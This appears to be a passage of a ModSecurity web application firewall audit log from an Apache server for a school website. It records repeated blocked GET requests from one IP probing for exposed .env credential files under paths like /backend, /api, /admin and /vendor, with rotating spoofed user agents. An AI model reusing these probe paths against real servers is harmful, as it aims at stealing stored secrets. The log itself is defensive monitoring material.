(phase 1) Stopwatch: 1748254528011717 824 (- - -) Stopwatch2: 1748254528011717 824; combined=282, p1=240, p2=0, p3=0, p4=0, p5=42, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e6be64a-Z-- --8f50a135-A-- [26/May/2025:17:15:28 +0700] aDQ_QHFOzWd_Ai7zJXWttwAAABU 103.236.140.4 54644 103.236.140.4 8181 --8f50a135-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0 --8f50a135-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f50a135-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254528227822 905 (- - -) Stopwatch2: 1748254528227822 905; combined=349, p1=301, p2=0, p3=0, p4=0, p5=47, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f50a135-Z-- --0655d33e-A-- [26/May/2025:17:15:28 +0700] aDQ_QP7lSIOiZEhmvSx4_gAAAFI 103.236.140.4 54650 103.236.140.4 8181 --0655d33e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; HTC_0PCV220/1.11.506.8 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --0655d33e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0655d33e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254528382544 933 (- - -) Stopwatch2: 1748254528382544 933; combined=353, p1=311, p2=0, p3=0, p4=0, p5=42, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0655d33e-Z-- --56aebc3f-A-- [26/May/2025:17:15:34 +0700] aDQ_RnFOzWd_Ai7zJXWtxwAAAAQ 103.236.140.4 54826 103.236.140.4 8181 --56aebc3f-B-- GET /backend/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko --56aebc3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56aebc3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254534422216 778 (- - -) Stopwatch2: 1748254534422216 778; combined=296, p1=259, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56aebc3f-Z-- --087e742e-A-- [26/May/2025:17:15:35 +0700] aDQ_R1SmKJQK-9oQ9SRLRAAAAIU 103.236.140.4 54870 103.236.140.4 8181 --087e742e-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 --087e742e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --087e742e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254535740727 651 (- - -) Stopwatch2: 1748254535740727 651; combined=246, p1=218, p2=0, p3=0, p4=0, p5=28, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --087e742e-Z-- --baf40e74-A-- [26/May/2025:17:15:36 +0700] aDQ_SFSmKJQK-9oQ9SRLSQAAAJE 103.236.140.4 54892 103.236.140.4 8181 --baf40e74-B-- GET /api/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0 --baf40e74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baf40e74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254536335698 809 (- - -) Stopwatch2: 1748254536335698 809; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baf40e74-Z-- --37d8a760-A-- [26/May/2025:17:15:36 +0700] aDQ_SHFOzWd_Ai7zJXWt2wAAABI 103.236.140.4 54898 103.236.140.4 8181 --37d8a760-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3) --37d8a760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37d8a760-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254536492144 863 (- - -) Stopwatch2: 1748254536492144 863; combined=327, p1=290, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37d8a760-Z-- --44c6071c-A-- [26/May/2025:17:15:37 +0700] aDQ_SVSmKJQK-9oQ9SRLTQAAAIE 103.236.140.4 54950 103.236.140.4 8181 --44c6071c-B-- GET /admin/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MAARJS; rv:11.0) like Gecko --44c6071c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44c6071c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254537969249 1091 (- - -) Stopwatch2: 1748254537969249 1091; combined=386, p1=341, p2=0, p3=0, p4=0, p5=45, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44c6071c-Z-- --a12f5f74-A-- [26/May/2025:17:15:38 +0700] aDQ_Sv7lSIOiZEhmvSx5JwAAAEE 103.236.140.4 54978 103.236.140.4 8181 --a12f5f74-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 --a12f5f74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a12f5f74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254538804149 925 (- - -) Stopwatch2: 1748254538804149 925; combined=370, p1=320, p2=0, p3=0, p4=0, p5=50, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a12f5f74-Z-- --59164573-A-- [26/May/2025:17:15:39 +0700] aDQ_S8-W3hHsdQpQwdTygQAAAMM 103.236.140.4 54998 103.236.140.4 8181 --59164573-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2393.94 --59164573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59164573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254539230533 748 (- - -) Stopwatch2: 1748254539230533 748; combined=312, p1=273, p2=0, p3=0, p4=0, p5=39, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59164573-Z-- --8be73072-A-- [26/May/2025:17:15:39 +0700] aDQ_S8-W3hHsdQpQwdTyhgAAANE 103.236.140.4 55014 103.236.140.4 8181 --8be73072-B-- GET /app/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36 --8be73072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8be73072-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254539699628 820 (- - -) Stopwatch2: 1748254539699628 820; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8be73072-Z-- --f37d0632-A-- [26/May/2025:17:15:41 +0700] aDQ_TXFOzWd_Ai7zJXWt5AAAAAY 103.236.140.4 55064 103.236.140.4 8181 --f37d0632-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C71 Safari/601.1 --f37d0632-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f37d0632-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254541443219 779 (- - -) Stopwatch2: 1748254541443219 779; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f37d0632-Z-- --65d0c11d-A-- [26/May/2025:17:15:42 +0700] aDQ_Ts-W3hHsdQpQwdTykAAAANY 103.236.140.4 55104 103.236.140.4 8181 --65d0c11d-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.0; SM-G920V Build/NRD90M) --65d0c11d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65d0c11d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254542633809 900 (- - -) Stopwatch2: 1748254542633809 900; combined=376, p1=336, p2=0, p3=0, p4=0, p5=39, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65d0c11d-Z-- --1dca5879-A-- [26/May/2025:17:15:42 +0700] aDQ_TlSmKJQK-9oQ9SRLZQAAAI0 103.236.140.4 55112 103.236.140.4 8181 --1dca5879-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1) Opera 12.16 --1dca5879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dca5879-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254542815726 794 (- - -) Stopwatch2: 1748254542815726 794; combined=324, p1=270, p2=0, p3=0, p4=0, p5=54, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dca5879-Z-- --d5003461-A-- [26/May/2025:17:15:43 +0700] aDQ_T1SmKJQK-9oQ9SRLaQAAAJM 103.236.140.4 55124 103.236.140.4 8181 --d5003461-B-- GET /vendor/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPad; CPU OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C89 Safari/602.1 --d5003461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5003461-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254543132592 784 (- - -) Stopwatch2: 1748254543132592 784; combined=316, p1=275, p2=0, p3=0, p4=0, p5=40, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5003461-Z-- --d88c8109-A-- [26/May/2025:17:15:43 +0700] aDQ_T8-W3hHsdQpQwdTylgAAANQ 103.236.140.4 55146 103.236.140.4 8181 --d88c8109-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 --d88c8109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d88c8109-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254543708839 668 (- - -) Stopwatch2: 1748254543708839 668; combined=253, p1=217, p2=0, p3=0, p4=0, p5=36, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d88c8109-Z-- --df9d9a2f-A-- [26/May/2025:17:15:45 +0700] aDQ_Uf7lSIOiZEhmvSx5QgAAAEQ 103.236.140.4 55194 103.236.140.4 8181 --df9d9a2f-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) WebClip/10601.6.11 Safari/10601.6.17 --df9d9a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df9d9a2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254545300634 858 (- - -) Stopwatch2: 1748254545300634 858; combined=324, p1=288, p2=0, p3=0, p4=0, p5=36, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df9d9a2f-Z-- --3b78b328-A-- [26/May/2025:17:15:45 +0700] aDQ_Uf7lSIOiZEhmvSx5RwAAAFU 103.236.140.4 55218 103.236.140.4 8181 --3b78b328-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; fr-fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5 --3b78b328-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b78b328-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254545942431 767 (- - -) Stopwatch2: 1748254545942431 767; combined=296, p1=260, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b78b328-Z-- --a415913b-A-- [26/May/2025:17:15:46 +0700] aDQ_UlSmKJQK-9oQ9SRLeAAAAIg 103.236.140.4 55242 103.236.140.4 8181 --a415913b-B-- GET /crm/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10532 --a415913b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a415913b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254546591931 863 (- - -) Stopwatch2: 1748254546591931 863; combined=371, p1=334, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a415913b-Z-- --a0498372-A-- [26/May/2025:17:15:47 +0700] aDQ_U3FOzWd_Ai7zJXWt-wAAABg 103.236.140.4 55266 103.236.140.4 8181 --a0498372-B-- GET /crm/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Creative AutoUpdate v1.40.01; EIE10;ENUSWOL) --a0498372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0498372-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254547313970 844 (- - -) Stopwatch2: 1748254547313970 844; combined=340, p1=301, p2=0, p3=0, p4=0, p5=39, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0498372-Z-- --d3077d34-A-- [26/May/2025:17:15:47 +0700] 